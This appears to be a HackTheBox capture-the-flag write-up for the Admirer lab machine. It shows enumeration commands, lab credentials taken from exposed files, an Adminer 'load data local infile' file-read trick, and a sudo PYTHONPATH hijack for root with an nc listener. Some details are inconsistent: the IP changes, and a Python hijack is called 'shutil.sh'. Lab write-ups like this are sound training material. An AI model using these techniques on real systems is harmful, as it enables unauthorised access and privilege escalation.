Admirer Writeup — HackTheBox
Made by RebornSec ®
Machine Maker(s) :
Overview :
- Finding some credentials from the directory admin-dir/
- Checking the files in ftp using the credentials we found
- Create our MySQL db and link it to adminer administration platform
- Get the credential and login as waldo
- We get
User.txt
- Creating file function make_archive() inside file called shutil.sh
- Launch shutil.sh using the option 6
- We get
Root.txt
Enumeration phase :
As usual let’s start with Nmap scan :
Nmap -sC -sV 10.10.10.175
As we can see http port is open. Let’s check it on the browser :
It looks like photos gallery website and there is no important link so far in the main page, so i decided to Dir buster the website and i found some important paths :
Let’s see what it contains :
curl -XGET http://10.10.10.187/admin-dir/contacts.txt
curl -XGET http://10.10.10.187/admin-dir/credentials.txt
As expected ! We got ftp credential, let’s use it :
ftpuser : %n?4Wz}R$tTF7
We get couple files : dump.sql and the compressed backup for html files html.tar.gz
Let’s look further now into the files we got : /utility-scripts/
admin_tasks.php we will use it later :
db_admin.php that i had some clue about it to access the MySQL server :
Digging more i found also other path :
Using all the credentials i got to login but nothing worked so i searched for a way to bypass it and i stopped in 2 articles demonstrate the way to bypass adminer as an administrator MySQL and PostgreSQL databases that are below 4.7.0 :
So i made the necessary setup of my own database as mention it in this article :
I did login with my own database “madcjdb” :
I did enter into my table “cjtable” :
Then i executed the command like it mentioned in the article above :
“load data local infile “/app/data/local.xml into table cjtable fields terminated by “\n”
but an error has occurred :
So i executed the path ../index.php :
“load data local infile “../index.php into table cjtable fields terminated by “\n”
Then i went to select :
And we got the new credential of Waldo :
waldo:&<h5b~yK3F#{PaPB&dA}{H>
Trying now to ssh using the new waldo credential :
And we got our user.txt :D
Root phase :
To the root face i checked what rights do waldo have :
So Waldo have the rights to use admin_tasks.sh file as root that we mentioned before and reading /opt/scripts/backup.py we got the way to bypass the root restriction by creating file function make_archive() inside file called shutil.sh :
Then we need to execute after running my nc :
sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
VOILA WE GOT OUR ROOT !